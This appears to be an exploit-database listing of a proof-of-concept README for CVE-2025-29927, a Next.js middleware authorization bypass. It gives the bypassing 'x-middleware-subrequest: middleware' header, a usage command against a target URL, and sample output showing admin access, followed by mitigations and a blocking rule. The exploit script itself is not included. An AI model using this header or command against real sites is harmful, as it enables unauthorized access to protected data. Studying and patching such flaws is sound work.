Exploit for CVE-2025-29927

Name: Exploit for CVE-2025-29927
Rating: 5 (69 reviews)
2025-03-29 | CVSS 9.1
## https://sploitus.com/exploit?id=D90DED66-9003-5C5A-9610-C236F11D7BE9
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

This repository contains a Proof of Concept (PoC) exploit for **CVE-2025-29927**, a critical vulnerability in **Next.js** that allows attackers to bypass authorization checks by abusing a middleware-specific HTTP header.

---

## Overview

- **CVE ID:** CVE-2025-29927  
- **Severity:** Critical (CVSS 9.1)  
- **Affected Framework:** [Next.js](https://nextjs.org/)  
- **Vulnerability Type:** Authorization Bypass  
- **Exploitation Vector:** HTTP Request Header  
- **Exploit Complexity:** Low  
- **Authentication Required:** No  

---

## About the Vulnerability

Next.js applications often rely on middleware for authorization and access control. This CVE arises from a logic flaw in how the `x-middleware-subrequest` header is processed. When this header is set to `middleware`, the server may incorrectly assume the request originated from internal logic and **bypass middleware-based auth**.

> This can allow attackers to access admin panels, protected APIs, or user data — with **no credentials or valid session.**

---

## PoC Exploit

We provide a simple Python script to test whether a Next.js application is vulnerable.

### ▶️ Usage

```bash
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
```

## Sample Output
```
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
```

## Dependencies

- Python 3.6+
- requests library

## Mitigation

- Upgrade to the latest patched version of Next.js.
- Avoid using x-middleware-subrequest as a trust signal.
- Implement server-side session validation and proper authorization checks in protected routes.
- Consider adding WAF/IDS rules to block or flag suspicious use of this header.

WAF Logic: 

```
if header 'x-middleware-subrequest' == 'middleware':
    block_request()
```

## Disclosure & Credits

This PoC was developed by the Offensive Security Team at W2H Corp. as part of our continuous vulnerability research efforts. The original post for the CVE explanation is [here](https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware).